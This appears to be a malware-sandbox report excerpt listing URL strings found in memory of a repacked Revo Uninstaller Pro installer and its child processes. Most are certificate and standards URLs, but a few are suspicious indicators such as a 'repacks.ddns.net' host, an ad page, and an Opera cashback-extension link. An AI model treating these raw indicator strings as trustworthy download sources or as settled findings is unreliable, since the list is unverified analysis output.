      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: powershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2323270683.00000000072E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftRR
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://localhost:3001api/prefs/?product=$1&version=$2..
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1750050502.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1970159457.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PACK.EXE, 00000010.00000003.2198109948.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199870901.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2198460363.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199605579.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199929800.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0W
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repacks.ddns.nethttps://repack.me/ad.htmlopen
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repacks.ddns.netopen
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C8A000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/http/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/SV
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1321
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4648S
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: ruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.Licence-Protector.com
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
      Source: ruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.animation.arthouse.org
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesA
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesa
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.borland.com/rootpart.xml
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.color.org
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txtS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.mirage-systems.de/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.mirage-systems.de/%operationName%
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/%operationName%A_
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/Q
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/a
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/tq
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdfS
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://www.opera.com0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.revouninstaller.com
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.revouninstaller.com/)
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.schneier.com/paper-blowfish-fse.htmlS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdfS
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vsrevogroup.com
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://addons.opera.com/en/extensions/details/dify-cashback/
